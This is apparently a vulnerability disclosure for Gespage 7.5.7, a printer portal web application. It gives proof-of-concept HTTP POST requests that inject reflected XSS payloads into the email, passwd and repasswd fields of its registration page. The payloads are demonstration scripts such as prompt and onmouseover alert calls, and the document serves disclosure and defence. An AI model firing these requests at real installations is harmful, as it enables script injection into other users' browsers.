Gespage is web solution providing a printer portal. Official Website: http://www.gespage.com/

The web application does not properly filter several parameters sent by users, allowing XSS code injection. These vulnerabilities allow attackers to inject code inside the client web browser, such as malicious scripts in Javascript.

Cross-site scripting (XSS) vulnerabilities in version 7.5.7 of Gespage software allow remote attackers to inject arbitrary web script or HTML via the email, passwd and repasswd parameters to webapp/users/user_reg.jsp

Proof of Concept

From the registration page, it is possible to inject malicious web code inside email, passwd and repasswd parameters. The POST request looks like the following:

Email Parameter Reflected XSS HTTP Request:

POST /gespage/webapp/users/user_reg.jsp HTTP/1.1
Host: 172.16.219.191:7180
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.219.191:7180/gespage/webapp/users/user_reg.jsp
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
Cookie: JSESSIONID=096358d6de175c9a64c2ce074f4f; JSESSIONID=e6c659f2d430044f9f5ba9d46a59
Connection: close
Upgrade-Insecure-Requests: 1

New_User=New&username=&email=%3chtml+xmlns%3d%22http%3a%2f%2fwww.w3.org%2f1999%2fxhtml%22%3e%3cscript%3eprompt("Ahmet_Gurel_XSS")%3c%2fscript%3e%3c%2fhtml%3e&passwd=&repasswd=&fullname=&accept_term=accept&OK=Register

Passwd Parameter Reflected XSS HTTP Request:

POST /gespage/webapp/users/user_reg.jsp HTTP/1.1
Host: 172.16.219.191:7180
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.219.191:7180/gespage/webapp/users/user_reg.jsp
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
Cookie: JSESSIONID=096358d6de175c9a64c2ce074f4f; JSESSIONID=e6c659f2d430044f9f5ba9d46a59
Connection: close
Upgrade-Insecure-Requests: 1

New_User=New&username=&email=&passwd=%22+onmouseover%3dalert(document.domain)+%3d%22&repasswd=&fullname=&accept_term=accept&OK=Register

 

Repasswd Parameter Reflected XSS HTTP Request:

POST /gespage/webapp/users/user_reg.jsp HTTP/1.1
Host: 172.16.219.191:7180
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.219.191:7180/gespage/webapp/users/user_reg.jsp
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
Cookie: JSESSIONID=096358d6de175c9a64c2ce074f4f; JSESSIONID=e6c659f2d430044f9f5ba9d46a59
Connection: close
Upgrade-Insecure-Requests: 1

New_User=New&username=&email=&passwd=&repasswd=%22+onmouseover%3dalert(document.domain)+%3d%22&fullname=&accept_term=accept&OK=Register